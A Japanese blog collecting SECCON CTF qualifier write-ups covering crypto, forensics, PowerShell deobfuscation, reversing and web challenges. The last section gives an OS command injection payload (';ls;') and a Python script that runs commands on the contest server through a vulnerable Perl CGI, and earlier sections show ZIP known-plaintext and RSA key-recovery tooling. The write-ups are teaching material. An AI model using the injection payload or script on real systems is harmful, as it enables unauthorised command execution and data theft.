#seccon

12/9-10の24時間、SECCONオンライン予選がありました。海外勢も含め計1028チームが参加していたようです。結果は53位でした。国内チームのなかでは12位なので、2月に開催される国内決勝大会へ進めそうです。

putchar music - Programming 100

問題文はつぎのとおり。

This one line of C program works on Linux Desktop. What is this movie's title? Please answer the flag as SECCON{MOVIES_TITLE}, replace all alphabets with capital letters, and spaces with underscores.

main(t,i,j){unsigned char p[]="###>5|(int)(t*x));}}

与えられたソースをコンパイルします。include文を追加して、-lm オプションを付けてコンパイル。

#include #include

main(t,i,j){unsigned char p[]="###>5|(int)(t*x));}}

$ gcc a.c -lm

実行すると標準出力に大量のデータが流れてきます。これを再生すると映画の音楽が流れてきます。PCの環境によって音が鳴ったり鳴らなかったり？

$ a.out | aplay 再生中 raw データ 'stdin' : Unsigned 8 bit, レート 8000 Hz, モノラル

flagは SECCON{STAR_WARS}

SHA-1 is dead - Crypto 100

問題文はつぎのとおり。

SHA-1 is dead

http://sha1.pwn.seccon.jp/ Upload two files satisfy following conditions:

file1 != file2 SHA1(file1) == SHA1(file2) SHA256(file1) SHA256(file2) 2017KiB 2017KiB

1KiB = 1024 bytes

SHA1衝突が発生する2つのファイルを作成するようです。 SHA1といえば、ハッシュ衝突するファイルが実際に生成されたと話題になった件ですね。

https://shattered.io/

SHA1が衝突するファイルは既にあるので、あとはファイルサイズの条件を満たせばOK。 ハッシュ値計算の仕組みから、ハッシュ値が同じ2つのファイルに同じデータを追記した場合、追記後のファイルのハッシュは再び一致するはず。 上記サイトから衝突が発生した2つのPDFファイルをダウンロードします。

-rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-1.pdf -rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-2.pdf

2017KiBより大きく2018KiBより小さいファイルが欲しいのでサイズを計算する。

422435 bytes / 1024 = 412 KiB (shattered.ioのPDFファイルサイズ) 2017 KiB - 412 KiB = 1605 KiB (追記すべきデータのサイズ)

あとは適当なダミーデータをPDFに追記するだけ。

$ python -c "print '\xff'*1024*1605" > ff $ cat shattered-1.pdf ff > 1.pdf $ cat shattered-2.pdf ff > 2.pdf

$ ls -lrt 合計 6468 -rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-1.pdf -rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-2.pdf -rwxrwxrwx 1 root root 1643521 12月 9 17:24 ff -rwxrwxrwx 1 root root 2065956 12月 9 17:24 1.pdf -rwxrwxrwx 1 root root 2065956 12月 9 17:25 2.pdf

$ sha1sum 1.pdf 2.pdf 82a7ab1ec5d028f3956b6fe92c8ed594bfb41d92 1.pdf 82a7ab1ec5d028f3956b6fe92c8ed594bfb41d92 2.pdf

$ sha256sum 1.pdf 2.pdf f240399f72872cccc4e24fd91431bc604b5668cf7ba7e6a1ee35ad58edd43f40 1.pdf 89873267dd5f3da340e1304409aecfc1bcbd89e5428192834f6f1cc7a6902a11 2.pdf

SHA1が衝突する2つのファイルが得られました。これを問題サイトにサブミットして終了。 flagは SECCON{SHA-1_1995-2017?}

Powerful_Shell - Binary 300

問題文はつぎのとおり。

Crack me. powerful_shell.ps1-1fb3af91eafdbebf3b3efa3b84fcc10cfca21ab53db15c98797b500c739b0024

与えられたファイルはこんな感じ。Power Shellのスクリプトが難読化されている？

$ECCON=""; $ECCON+=[char](3783/291); $ECCON+=[char](6690/669); $ECCON+=[char](776-740); $ECCON+=[char](381-312); $ECCON+=[char](403-289); $ECCON+=[char](-301+415); $ECCON+=[char](143-32); $ECCON+=[char](93594/821); $ECCON+=[char](626-561); $ECCON+=[char](86427/873); $ECCON+=[char](112752/972); $ECCON+=[char](43680/416); $ECCON+=[char](95127/857);

(省略)

$ECCON+=[char](873-863); $ECCON+=[char](721-708); $ECCON+=[char](803-793); $ECCON+=[char](10426/802); Write-Progress -Activity "Extracting Script" -status "20040" -percentComplete 99; $ECCON+=[char](520-510); Write-Progress -Completed -Activity "Extracting Script";.([ScriptBlock]::Create($ECCON))

Windowsのデフォルトだとスクリプト実行がポリシーで制限されている。まずはスクリプトを実行可能にするために、PowerShellを管理者権限で起動して以下のコマンドを実行する。

PS C:\work> Set-ExecutionPolicy RemoteSigned

スクリプト実行するとSECCONの画像が表示されるが何かのチェックで終了している模様。

難読化されているといっても所詮はスクリプトなので最後のほうでeval的なことをしているのではと思う。 それらしいところを探して、デコードされて読みやすくなった状態のコード(があるはずと想定して)を出力してみる。

最後の行を変更してファイル出力

(変更前) Write-Progress -Completed -Activity "Extracting Script";.([ScriptBlock]::Create($ECCON))

(変更後) Write-Progress -Completed -Activity "Extracting Script";[ScriptBlock]::Create($ECCON)|Out-File -FilePath C:\work\output.ps1 -Encoding Ascii

再度実行すると、デコードされたスクリプトが得られる。ちなみにこのスクリプト、デバッガによる実行を検知すると終了するようになっている。

PS C:\work> .\powerful_shell.ps1

といってもまだ難読化されているのだが。 シンタックスエラーがあるので改行コードを若干修正すると実行できる。 また、処理中に実行環境のチェックをしているのでその部分をスキップして実行するとピアノの鍵盤が。実際に音もなるらしい？(自分の環境ではうまくならなかった)

処理の後半では、正しいキー入力(ピアノ演奏)を基に生成した鍵を使って、XORでデータ復号している。

(省略)

$text=@" YkwRUxVXQ05DQ1NOE1sVVU4TUxdTThBBFVdDTUwTURVTThMqFldDQUwdUxVRTBNEFVdAQUwRUxtT TBEzFVdDQU8RUxdTbEwTNxVVQUNOEFEVUUwdQBVXQ0NOE1EWUUwRQRtVQ0FME1EVUU8RThdVTUNM EVMVUUwRFxdVQUNCE1MXU2JOE0gWV0oxSk1KTEIoExdBSDBOE0MVO0NKTkAoERVDSTFKThNNFUwR FBVINUFJTkAqExtBSjFKTBEoF08RVRdKO0NKTldKMUwRQBc1QUo7SlNgTBNRFVdJSEZCSkJAKBEV QUgzSE8RQxdMHTMVSDVDSExCKxEVQ0o9SkwRQxVOE0IWSDVBSkJAKBEVQUgzThBXFTdDRExAKhMV Q0oxTxEzFzVNSkxVSjNOE0EWN0NITE4oExdBSjFMEUUXNUNTbEwTURVVSExCKxEVQ0o9SkwRQxVO EzEWSDVBSkJAKBEVQUgzThAxFTdDREwTURVKMUpOECoVThNPFUo3U0pOE0gWThNEFUITQBdDTBFK F08RQBdMHRQVQUwTSBVOEEIVThNPFUNOE0oXTBFDF0wRQRtDTBFKFU4TQxZOExYVTUwTSBVMEUEX TxFOF0NCE0oXTBNCFU4QQRVBTB1KFU4TThdMESsXQ04TRBVMEUMVThNXFk4TQRVNTBNIFUwRFBdP

(省略)

E0QVTUwTSBVMEUYXTxFAF0NCE0oXTBNCFU4QFhVBTB1KFU4TQBdMEUIXQ04TRBVMEUAVThNDFkFM EUobTBNDFUwRFBdAThNIFUITQRdME0wVQU8RShdMHUMVThMoF0wRNhdDThNEFUwRRhVOEzEWQUwR ShtME0EVTBFGF0BOE0gVQhNDF0wTVxVBTxFKF0wdQxVOEygXTBE2FxROE10VShZOTBFTF2E= "@

$plain=@() $byteString = [System.Convert]::FromBase64String($text) $xordData = $(for ($i = 0; $i -lt $byteString.length; ) { for ($j = 0; $j -lt $f.length; $j++) { $plain+=$byteString[$i] -bxor $f[$j] $i++ if ($i -ge $byteString.Length) { $j = $f.length } } }) iex([System.Text.Encoding]::ASCII.GetString($plain))

キーストローク入力を照合しているコード部分を読んで鍵を特定する。

$f="hhjhhjhjkjhjhf"

さらに、復号後のデータをファイル出力するようにスクリプトを修正して実行。

(変更前) iex([System.Text.Encoding]::ASCII.GetString($plain))

(変更後) [System.Text.Encoding]::ASCII.GetString($plain)|Out-File -FilePath C:\work\output3.ps1 -Encoding Ascii

そうして得られた復号後のスクリプトはまだ難読化されてる。。。変数名が記号になっているのでややこしい。

${;}=+$();${=}=${;};${+}=++${;};${@}=++${;};${.}=++${;};${[}=++${;}; ${]}=++${;};${(}=++${;};${)}=++${;};${&}=++${;};${|}=++${;}; ${"}="["+"$(@{})"[${)}]+"$(@{})"["${}${|}"]"$(@{})"["${@}\({}"]+"\)?"[${+}]+"]"; ${;}"".("$(@{})"["${}${[}"]"$(@{})"["${}${(}"]"$(@{})"[${}]+"$(@{})"[${[}]+"$?"[${+}]+"$(@{})"[${.}]); ${;}"$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${(}+${"}${ (省略)

また最後の行に着目して、デコード後のスクリプトを出力する。

(変更前) ${;}="$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${(}+${"}${ (省略)

(変更後) ${;}="$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"]; Write-Host "${"}${.}${(}+\({"}\)

出力結果はこちら。またまた難読化されてる。

[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]61+[CHar]82+[CHar]101+[CHar]97+[CHar]100+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]45+[CHar]80+[CHar]114+[CHar]111+[CHar]109+[CHar]112+[CHar]116+[CHar]32+[CHar]39+[CHar]69+[CHar]110+[CHar]116+[CHar]101+[CHar]114+[CHar]32+[CHar]116+[CHar]104+[CHar]101+[CHar]32+[CHar]112+[CHar]97+[CHar]115+[CHar]115+[CHar]119+[CHar]111+[CHar]114+[CHar]100+[CHar]39+[CHar]13+[CHar]10+[CHar]73+[CHar]102+[CHar]40+[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]32+[CHar]45+[CHar]101+[CHar]113+[CHar]32+[CHar]39+[CHar]80+[CHar]48+[CHar]119+[CHar]69+[CHar]114+[CHar]36+[CHar]72+[CHar]51+[CHar]49+[CHar]49+[CHar]39+[CHar]41+[CHar]123+[CHar]13+[CHar]10+[CHar]9+[CHar]87+[CHar]114+[CHar]105+[CHar]116+[CHar]101+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]39+[CHar]71+[CHar]111+[CHar]111+[CHar]100+[CHar]32+[CHar]74+[CHar]111+[CHar]98+[CHar]33+[CHar]39+[CHar]59+[CHar]13+[CHar]10+[CHar]9+[CHar]87+[CHar]114+[CHar]105+[CHar]116+[CHar]101+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]34+[CHar]83+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]123+[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]125+[CHar]34+[CHar]13+[CHar]10+[CHar]125|iex

再度、最後の箇所で難読化解除後のスクリプトを出力するよう変更。

実行して得られた結果がこちら。ようやくゴール！

$ECCON=Read-Host -Prompt 'Enter the password' If($ECCON -eq 'P0wEr$H311'){ Write-Host 'Good Job!'; Write-Host "SECCON{$ECCON}" }

flagは SECCON{P0wEr$H311}

Ps and Qs - Crypto 200

問題文はつぎのとおり。

Decrypt it. psqs1-0dd2921c9fbdb738e51639801f64164dd144d0771011a1dc3d55da6fbcb0fa02.zip (pass:seccon2017)

与えられたZipファイルの中身は暗号文と公開鍵2つです。

Archive: psqs1-0dd2921c9fbdb738e51639801f64164dd144d0771011a1dc3d55da6fbcb0fa02.zip Length Date Time Name –—— -— -— ---- 512 12-09-17 01:33 cipher 800 12-09-17 01:33 pub1.pub 800 12-09-17 01:33 pub2.pub

$ openssl rsa -in pub1.pub -text -pubin Public-Key: (4096 bit) Modulus: 00:cf:cf:bb:ee:a7:df:14:3a:8a:c2:08:b1:aa:1d: 2f:86:54:5a:c4:cb:58:8c:94:a3:fb:1c:14:ad:91: a4:f0:b9:36:15:7c:5a:4b:86:9c:18:a8:b8:64:f4: (省略)

$ openssl rsa -in pub2.pub -text -pubin Public-Key: (4096 bit) Modulus: 00:bb:33:cc:7f:cc:8e:ca:f3:bf:9e:d9:5c:58:37: 92:e1:ec:6b:80:ee:87:5e:c2:06:4d:bc:f0:75:95: c8:34:49:23:bf:53:65:24:d4:e0:a7:55:74:c7:79: (省略)

暗号文ひとつに対してわざわざ公開鍵ふたつを渡しているのが気になります。と思いつつ調べているとこんなのを見つけてしまいました。

https://github.com/Ganapati/RsaCtfTool

RsaCtfTool RSA tool for ctf - uncipher data from weak public key and try to recover private key Automatic selection of best attack for the given public key

一瞬で終了、ラッキー。

$ ~/RsaCtfTool/RsaCtfTool.py –publickey "*.pub" –private > private $ openssl rsautl -decrypt -inkey private -in cipher -out plain.txt $ cat plain.txt SECCON{1234567890ABCDEF}

flagは SECCON{1234567890ABCDEF}

JPEG file - Binary 100

問題文はつぎのとおり。

Read this JPEG is broken. It will be fixed if you change somewhere by 1 bit.

ファイルが壊れていると言っているので、修復すればflagが表示されるということでしょう。

JPEG修復してくれるというツールを適当に探してきて実行しただけ。怪しげなツールだと困るので、ツール実行前にスナップショットをとっておいて後で戻しておきました。こういう時に仮想マシンは便利です。

12/10〜11の24時間、SECCONオンライン予選がありました。海外勢も含め計930チームが参加していたようです。今年はYamatoSecで参 加して170位でした。

自分で解いた問題のほか、ほかのメンバーが解いたものもまとめてWrite Up書いときます。

Vigenere - Crypto 100

問題文はつぎのとおり。

k: ???????????? p: SECCON{???????????????????????????????????} c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ

k=key, p=plain, c=cipher, md5(p)=f528a6ab914c1ecf856a1d93103948fe

ABCDEFGHIJKLMNOPQRSTUVWXYZ{} (換字表は省略)

Vigenere cipher https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher

問題のヒントにもあるように、ヴィジュネル暗号を解けというものです。

ただし、通常の(？)ヴィジュネル暗号と違い、換字表にA-Zのほか、{}が含まれています。オンラインサイトなどで簡単に解けないよ うに、ということなのでしょう。

既知の平文と暗号文のペアが一部与えられているので、その部分の鍵は換字表を使って普通に出ます。

k: VIGENER????? p: SECCON{???????????????????????????????????} c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ

残りの鍵は5文字で、文字種も限られている(A-Z{}の計28種)ので、単純に総当たりすれば解けそうです。

#!/usr/bin/env python # -*- coding: utf-8 -*-

import sys import hashlib

# ヴィジュネル暗号のテーブルの並び LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ{}'

def main():    # 問題文    key = ['?', '?', '?', '?', '?', '?', '?', '?', '?', '?', '?', '?']    plain = "SECCON{???????????????????????????????????}"    cipher = "LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ"    p_md5 = "f528a6ab914c1ecf856a1d93103948fe"

   # 既知の平文・暗号文から鍵を求める    for i in range(0, len(plain)):        if (i < 7 or i == len(plain) - 1):            key[i % len(key)] = getKey(plain[i], cipher[i])

   print "Partial Key: %s" % "".join(key)

   # 鍵の残りを総当たり[VIGENER?????]    alphabet = [chr(x) for x in range(ord('A'), ord('Z') + 1)]    for a in alphabet:        for b in alphabet:            for c in alphabet:                for d in alphabet:                    for e in alphabet:                        key_try = "".join(key[:7]) + a + b + c + d + e                        p = decrypt(key_try, cipher)                        # 問題文のMD5が得られたら正解                        if (hashlib.md5(p).hexdigest() == p_md5):                            print "Key is: %s" % key_try                            print "Plain text is: %s" % p                            sys.exit()

def getKey(p, c):    num1 = LETTERS.find(p)    num2 = LETTERS.find(c)    if (num1 > num2):        num2 += len(LETTERS)    return LETTERS[num2 - num1]

# https://inventwithpython.com/vigenereCipher.py # のコードを利用 def decrypt(key, message):    translated = [] # stores the encrypted/decrypted message string    keyIndex = 0

   for symbol in message: # loop through each character in message        num = LETTERS.find(symbol)        if num != -1: # -1 means symbol.upper() was not found in LETTERS            num -= LETTERS.find(key[keyIndex]) # subtract if decrypting            num %= len(LETTERS) # handle the potential wrap-around

           # add the encrypted/decrypted symbol to the end of translated.            translated.append(LETTERS[num])

           keyIndex += 1 # move to the next letter in the key            if keyIndex == len(key):                keyIndex = 0        else:            # The symbol was not in LETTERS, so add it to translated as is.            translated.append("?")

   return ''.join(translated)

# If vigenereCipher.py is run (instead of imported as a module) call # the main() function. if __name__ == '__main__':    main()

実行するとこんな感じ。

Key is: VIGENERECODE Plain text is: SECCON{ABABABCDEDEFGHIJJKLMNOPQRSTTUVWXYYZ}

flagは SECCON{ABABABCDEDEFGHIJJKLMNOPQRSTTUVWXYYZ} 。

VoIP - Forensics 100

問題文はつぎのとおり。

Extract a voice. The flag format is SECCON{[A-Z0-9]}. voip.pcap

まずはpcapファイルをWiresharkで開きます。

プロトコルRTPに着目し、適当なRTPパケットを選択した状態で、[電話] - [RTP] - [ストリーム分析] とします。

再生するとフラグが読み上げられる。Wireshark、多機能ですね。 flagは SECCON{9001IVR}。

Memory Analysis - Forensics 100

問題文はつぎのとおり。

Find the website that the fake svchost is accessing. You can get the flag if you access the website!! memoryanalysis.zip The challenge files are huge, please download it first.

Hint1: http://www.volatilityfoundation.org/ Hint2: Check the hosts file

zipファイルを解凍すると forensic_100.raw というファイルがある。問題文やヒントでvolatilityのリンクがついてることから、メ モリのダンプを解析せよということで間違いないはず。

早速volatilityでイメージ解析。

# volatility -f forensic_100.raw imageinfo Volatility Foundation Volatility Framework 2.5 INFO    : volatility.debug    : Determining profile based on KDBG search...          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)

WindowsXPのメモリだと判明。

起動中のプロセスをチェックしてみる。

# volatility -f forensic_100.raw --profile=WinXPSP2x86 pslist Volatility Foundation Volatility Framework 2.5 Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                           ---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------ 0x823c8660 System                    4      0     58      259 ------      0                                                               0x81a18020 smss.exe                540      4      3       19 ------      0 2016-12-06 05:27:04 UTC+0000                                 0x81ef6da0 csrss.exe               604    540     11      480      0      0 2016-12-06 05:27:07 UTC+0000                                 0x82173da0 winlogon.exe            628    540     24      541      0      0 2016-12-06 05:27:07 UTC+0000                                 0x8216e670 services.exe            672    628     15      286      0      0 2016-12-06 05:27:07 UTC+0000                                 0x81f8c9a0 lsass.exe               684    628     26      374      0      0 2016-12-06 05:27:07 UTC+0000                                 0x82154880 vmacthlp.exe            836    672      1       25      0      0 2016-12-06 05:27:08 UTC+0000                                 0x81e18da0 svchost.exe             848    672     20      216      0      0 2016-12-06 05:27:08 UTC+0000                                 0x82151ca8 svchost.exe             936    672     10      272      0      0 2016-12-06 05:27:08 UTC+0000                                 (省略) 0x8225bda0 IEXPLORE.EXE            380   1776     22      385      0      0 2016-12-06 05:27:19 UTC+0000                                 0x8229f7e8 IEXPLORE.EXE           1080    380     19      397      0      0 2016-12-06 05:27:21 UTC+0000                                 0x81f2cb20 wuauclt.exe            3164   1036      5      107      0      0 2016-12-06 05:28:15 UTC+0000                                 0x819b4380 tcpview.exe            3308   1556      2       84      0      0 2016-12-06 05:28:42 UTC+0000

IEが起動しているのが気になる。 iehistory というプラグインがあるようなので試してみる。

# volatility -f forensic_100.raw --profile=WinXPSP2x86 iehistory Volatility Foundation Volatility Framework 2.5 ************************************************** Process: 1080 IEXPLORE.EXE Cache type "DEST" at 0x201ca83 Last modified: 2016-12-06 14:28:40 UTC+0000 Last accessed: 2016-12-06 05:28:42 UTC+0000 URL: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd Title: Security & Reverse :: [Data Science] Pandas - \),

IEで接続していたURLを発見。ブラウザで実際に開いてみるが、韓国語の意味がわからないサイト。

問題のヒントで hosts ファイルをチェックせよ、とあったので、hosts ファイルを抜き出してみることにする。以下のチートシートを参考にした。

http://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf Locate and extract the HOSTS file to local directory

filescan プラグインでファイルのリストを列挙、dumpfiles プラグインで hosts ファイルが展開されていたメモリアドレスをダンプする。

# volatility -f forensic_100.raw --profile=WinXPSP2x86 filescan | egrep hosts$ Volatility Foundation Volatility Framework 2.5 0x000000000217b748      1      0 R--rw- \Device\HarddiskVolume1\WINDOWS\system32 \drivers\etc\hosts

# volatility --profile=WinXPSP2x86 -f forensic_100.raw dumpfiles -Q 0x000000000217b748 --name -D hosts/ Volatility Foundation Volatility Framework 2.5 DataSectionObject 0x0217b748   None   \Device\HarddiskVolume1\WINDOWS\system32\drivers\etc\hosts

取得できたファイルの中身はこんな感じ。

# Copyright (c) 1993-1999 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # #      102.54.94.97     rhino.acme.com          # source server #       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost 153.127.200.178    crattack.tistory.com

最後の行には先ほどチェックしたホスト名のエントリがあります。 名前解決してみると実際には異なるアドレス、これは怪しい。

# dig crattack.tistor

; <<>> DiG 9.10.3-P4-Debian <<>> crattack.tistory.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 64847 ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3

(省略)

;; ANSWER SECTION: crattack.tistory.com.3600INA175.126.170.110 crattack.tistory.com.3600INA175.126.170.70

(省略)

自分のマシンの hosts ファイルにも同じようにエントリを追記して、再度ブラウザでアクセス。無事フラグが書かれたファイルがダウンロードされました。

# cat Data-Science-import-pandas-as-pd SECCON{_h3110_w3_h4ve_fun_w4rg4m3_}

flagは SECCON{_h3110_w3_h4ve_fun_w4rg4m3_}。

Anti-Debugging - Binary 100

問題文

Reverse it. bin may some AV will alert,but no problem.

与えられたファイルを見てみると Windowsの実行ファイル。 Windowsマシンで解析することにします。

# file bin bin: PE32 executable (console) Intel 80386, for MS Windows

実行してみるとパスワードを聞かれ、適当に入力すると間違いと言われます。

C:\Users\root\Desktop\anti-debugging>bin.exe Input password >password password is wrong.

このままではラチがあかないので OllyDgb で開くことに。

F9 で実行。パスワード入力画面で停止します。

この近辺のコードをチェックしてみます。適当な場所で右クリック、[検索] - [全ての参照文字列] を選ぶ。

新たに開くウインドウで "Input password > " を探し、ダブルクリックすると該当個所へジャンプします。

もう少し下へスクロールすると、入力を受け付けたパスワードを比較する処理があります。さらにその先には、デバッガを使っていないか、仮想環境ではないか、といったふうに、デバッグされていたら終了する処理がたくさん組み込まれています。

さらにスクロールしてくと、ようやくアンチデバッグ処理が終了して、意味深な文字列を参照する箇所が見えてきます。途中の処理をスキップして、ここへたどり着くことを目指します。

いったん上へもどって、パスワード照合の処理をスキップします。 該当行をダブルクリックするとコード編集できるので、NOP　(何もしない命令)とします。

こんな感じでそれぞれのデバッグ検知処理を飛ばしてもよいのですが、面倒なので一気にジャンプします。 最後の検知処理後の行き先がアドレス00401652なので、パスワード照合後にJMP命令を入れます。

ところがこのままではうまく行きません。00401652番地以降では無条件に終了処理へ(0 = 1 が成立しなかったら終了)ジャンプするようになっているようです。 そこでそのジャンプ命令も削除しておきます。 また、00401652に到達したら処理中断するよう、ブレイクポイントをセットしておきます。該当行選択した状態で、F2 キーを押すとOK(セットされたら赤色になる)。

ここまで準備ができたらあとは進めるだけ。 パスワード入力画面へ戻って適当な文字を入力、するとブレイクポイントで停止するので、あとは F8 キーを押してステップ実行してきます。 先ほどの怪しげな文字列以降、何回かループ処理があり、最終的にはスタックに積まれたフラグがメッセージボックスで表示されます。

flagは SECCON{check_Ascii85} 。

12/5～6の24時間、SECCONオンライン予選がありました。海外勢も含め計872チームが参加していたようです。Ganbare Tigers Jrは134位でした。

Start SECCON CTF - Exercises 50

まずは練習ということで。問題文は以下のとおり。

ex1 Cipher:PXFR}QIVTMSZCNDKUWAGJB{LHYEO Plain: ABCDEFGHIJKLMNOPQRSTUVWXYZ{}

ex2 Cipher:EV}ZZD{DWZRA}FFDNFGQO Plain: {HELLOWORLDSECCONCTF}

quiz Cipher:A}FFDNEVPFSGV}KZPN}GO Plain: ?????????????????????

平文と暗号文のペアが例として与えられていて、問題の暗号文を復号せよということ。まあ、雰囲気的に換字式暗号ですね。ex1とex2のCipher->Plainへの変換ルールをもとに、quizのCipherを変換する。trコマンドでスマートにやってた人がいたのでそれを紹介。

root# echo A}FFDNEVPFSGV}KZPN}GO | tr PXFR}QIVTMSZCNDKUWAGJB{LHYEO ABCDEFGHIJKLMNOPQRSTUVWXYZ{}

SECCON{HACKTHEPLANET}

flagは SECCON{HACKTHEPLANET} 。

Unzip the file - Crypto 100

問題として "unzip" という名前のファイルが与えられる。

root# file unzip unzip: Zip archive data, at least v2.0 to extract

解凍しようとするとパスワード保護されているようです。

root# unzip unzip Archive: unzip [unzip] backnumber08.txt password:

ファイルの中身はこんな感じ。

root# unzip -l unzip Archive: unzip Length Date Time Name ——— -——— –— ---- 14182 2015-11-30 16:23 backnumber08.txt 12064 2015-11-30 16:22 backnumber09.txt 22560 2015-12-01 15:21 flag ——— ------- 48806 3 files

検索すると "backnumber08.txt" と "backnumber09.txt" はSECCONメールマガジンのファイル名だと分かります。暗号化されたZIPの中身の一部が公開情報ということで、既知平文攻撃で解くものと考えて間違いなさそうです。pkcrackという有名なツールを使います。

root# ./pkcrack Usage: ./pkcrack -c <crypted_file> -p <plaintext_file> [other_options], where [other_options] may be one or more of -o <offset> for an offset of the plaintext into the ciphertext, (may be negative) -C <c-ZIP> where c-ZIP is a ZIP-archive containing <crypted_file> -P <p-ZIP> where p-ZIP is a ZIP-archive containing <plaintext_file> -d <d-file> where d-file is the name of the decrypted archive which will be created by this program if the correct keys are found (can only be used in conjunction with the -C option) -i switch off case-insensitive filename matching in ZIP-archives -a abort keys searching after first success -n no progress indicator

SECCONのサイトから "backnumber08.txt" と "backnumber09.txt" をダウンロード。これらのファイルからZIP(暗号化なし)を作っておきます。

root# zip known.zip backnumber0*.txt adding: backnumber08.txt (deflated 63%) adding: backnumber09.txt (deflated 60%)

あとはpkcrackを実行。

root# pkcrack -c backnumber08.txt -p backnumber08.txt -C unzip -P known.zip -d decrypted.zip

しばらく待つと無事終了。

(省略) Decrypting backnumber08.txt (5315a01322ab296c211eecba)… OK! Decrypting backnumber09.txt (83e6640cbec32aeaf10ed1ba)… OK! Decrypting flag (34e4d2ab7fe1e2421808bab2)… OK! Finished on Thu Dec 31 11:51:43 2015

復号後のZIPファイルが -d で指定した名前で生成されているので、解凍。

root# unzip decrypted.zip Archive: decrypted.zip inflating: backnumber08.txt inflating: backnumber09.txt inflating: flag

ファイル flag はword文書のようです。

root# file flag flag: Microsoft Word 2007+

開いてみると何も書かれていない状態。

文字が白色で書かれていただけで、背景を色付けするとこのとおり。

flagは SECCON{1s_th1s_passw0rd_ weak?} 。

Entry form - Web/Network 100

URLが与えられる。アクセスしてみると、メールアドレスと名前を入力するフォームが表示される。

http://entryform.pwn.seccon.jp/register.cgi

http://entryform.pwn.seccon.jp/ へアクセスするとディレクトリリスティングでき、 register.cgi_bak という名前のファイルがあります。上記URLで動いているCGIのバックアップファイルと見てソースコードを眺めます。ユーザから受け付けたパラメータをもとに、メール送信してログ記録する、という処理のようです。 ここで注目は以下の箇所で、ユーザからの入力を適切に処理しておらず、OSコマンドインジェクションが成立するものと思われます。

(省略) if($q->param("mail") ne '' && $q->param("name") ne '') { open(SH, "|/usr/sbin/sendmail -bm '".$q->param("mail")."'"); (省略)

perlのopen関数で|を使うとOSコマンドを実行します。上記箇所ではmailパラメータの値がsendmailの引数として渡されて処理されます。正常動作する例として mail = [email protected] の場合だと、以下のコマンドが実行されます。

/usr/sbin/sendmail -bm '[email protected]'

mailパラメータを細工して、任意のコマンドをインジェクションします。'(カンマ);(セミコロン)でいったんsendmailを完結させて引き続き別コマンドを実行する方法です。例えばlsコマンド実行する場合は mail = %27%3bls%3b%27 を送信します(';ls;' をurlエンコードした文字列)。CGI側では以下のコマンドを実行するようになります。

/usr/sbin/sendmail -bm '';ls;''

実際はこんな感じのコードを書いて順次コマンドを試していきました。

#!/usr/bin/python import urllib2

target = 'http://entryform.pwn.seccon.jp/register.cgi'

#cmd = 'ls%20-l' #cmd = 'whoami' #cmd = 'pwd' #cmd = 'id' #cmd = 'ls%20-l%20SECRETS' cmd = 'cat%20/var/www/html/SECRETS/backdoor123.php'

#cmd = 'cat%20/var/www/html/log'

mail = '%27%3b' + cmd + '%3b\'' name = 'testname'

response = urllib2.urlopen(target + '?mail=' + mail + '&name=' + name) html = response.read() print html

コマンド実行結果を見やすくしたもの。 log というファイルは権限がないのでそのままでは閲覧できません。いろいろ見てみると、backdoor123.php という名前のバックドアを設置してくれているのを発見。

$ ls -l total 2988 dr-xr-xr-x 2 root root 4096 Dec 1 21:52 SECRETS -r—w-— 1 apache cgi 3037761 Dec 5 19:05 log -r–r–r– 1 root root 1132 May 15 2015 logo.png -r-xr-xr-x 1 cgi cgi 1583 Dec 1 22:02 register.cgi -r–r–r– 1 root root 1583 Dec 1 22:25 register.cgi_bak

$ whoami cgi

$ pwd /var/www/html

$ id uid=1001(cgi) gid=1001(cgi) groups=1001(cgi),1003(alien)

$ls -l SECRETS -r–r–r– 1 root root 42 Dec 1 21:52 backdoor123.php -r–r–r– 1 root root 19 Dec 1 21:52 index.html

